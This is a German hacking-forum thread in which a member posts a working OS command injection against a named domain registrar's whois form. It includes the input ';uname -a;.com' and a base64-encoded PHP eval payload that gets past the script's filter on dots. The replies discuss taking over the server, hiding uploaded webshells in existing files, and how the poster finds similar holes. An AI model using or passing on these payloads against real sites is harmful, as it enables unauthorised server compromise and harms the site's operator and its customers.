Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

austdomains.com.au -OS Command Injection

- - - - -

  • Bitte melde dich an um zu Antworten
5 Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux

Please Login HERE or Register HERE to see this link!



Im Feld folgendes eingeben:

;uname -a;.com

Das Skript verlangt am Ende der Eingabe eine unterstützte Domain mit Punkt und Domainname. Werden weitere Punkte irgendwo in das Feld eingegeben, ignoriert das Skript die Anfrage. Das bedeutet, daß wir nur eine Shell mit stark eingeschränkter Funktion haben. Geben wir jetzt zum Beispiel "ls .." ein, würden wir nicht das darüberliegende Verzeichnis zu sehen bekommen, sondern nichts.

So umgehen wir das:

Wir haben Zugriff auf den php-Interpreter und können mit Hilfe des Parameters -r php-Code direkt in der Kommandozeile ausführen. Um die Restriktion mit den Punkten zum umgehen hilft uns die Funktion "base64_decode". In einem base64-String kommen nämlich keine Punkte vor.


Nehmen wir jetzt diesen Code:

system("ls ../");


Den Codieren wir jetzt mit Hilfe eines Tools in base64:

c3lzdGVtKCJscyAuLi8iKTs

(eventuell müssen = Zeichen am Ende entfernt werden)


Jetzt geben wir unser fertiges Kommando in das Feld ein:

;php -r "eval(base64_decode("c3lzdGVtKCJscyAuLi8iKTs"));";.com

und wir haben keine Einschränkungen mehr.
  • Ch!ller gefällt das

Thanked by 1 Member:
Aurus

#2
JudeMitHut

JudeMitHut

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 6 Beiträge
  • 0 Bedankt
Gute arbeit.!!!
Könntest du auch ein Tutorial fertigen welches beschreibt wie man nun mit dieser Sicherheitslücke den Server mittels .php-Shell oder sonstigen "übernehmen" kann?

FVCKB!TCHE$GETMONE??


#3
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    955
  • 896 Beiträge
  • 1384 Bedankt
  • Spender
  • verifiziert
@Zero-X, ich finde es Klasse das du den "vorgang" sehr gut erklärst
  • Zero-X gefällt das
Alle Angaben und Informationen dienen lediglich der Theorie!

#4
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
@Ch!ller: Danke, ich geb mein bestes ;)

@JudeMitHut: Der Server ist eigentlich schon "übernommen". Die Shell hast du bereits mit dem Eingabefeld auf der Seite und kannst alles damit anstellen, was du möchtest. Ich persönlich arbeite eigentlich überhaupt nicht mit Webshells die man hochlädt. Ich suche immer nach Möglichkeiten, keine Veränderungen an den vorhandenen Systemen vorzunehmen und sollte ich mal, aus welchen Gründen auch immer, mal eine Shell auf den Server uppen, lösche ich sie nach Gebrauch wieder oder verstecke sie in einer bereits vorhandenen Datei.
  • Ch!ller gefällt das

#5
JudeMitHut

JudeMitHut

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 6 Beiträge
  • 0 Bedankt
Alles klar hast ja recht... man kann die Befehle ja Manuel eingeben ^^.png' class='bbc_emoticon' alt='^^' />


Wie findest du solche Vulns? Gibt es dazu auch gute Programme?

FVCKB!TCHE$GETMONE??


#6
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Ich benutze zum größten Teil Firefox-Plugins wie Live HTTP Headers, Hackbar oder User Agent Switcher um mir die Arbeit etwas zu erleichtern.
Um solche Vulns an sich zu finden, benutze ich keine Programme, ich habe da so ganz eigene Methoden. Eine ist, daß ich mir bewusst Skripte heraussuche, die mit großer Wahrscheinlichkeit auf Funktionen des Betriebssystems zugreifen wie zum Beispiel das Whois-Skript in diesem Thread. Es führt mit der Funktion system() den Shell-Befehl "whois" aus.
  • Ch!ller gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 35 user(s)


    , AdlerRhy, Aurus, BackBurner, Ch!ller, cooky1, curlz, Cyber-Agent, done65, easysurfer, Eester, FalkE, FatalityMods, Framerater, gutzuu, HellYeah, Husti_nett, Jar3d, JudeMitHut, kpakpando, L!x, lolorollo, most_uniQue, Ne0, notfound, paulaner, pdr0, ProHex, virgoFF, vôl, will, Xantar, Xenio, XoiL, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.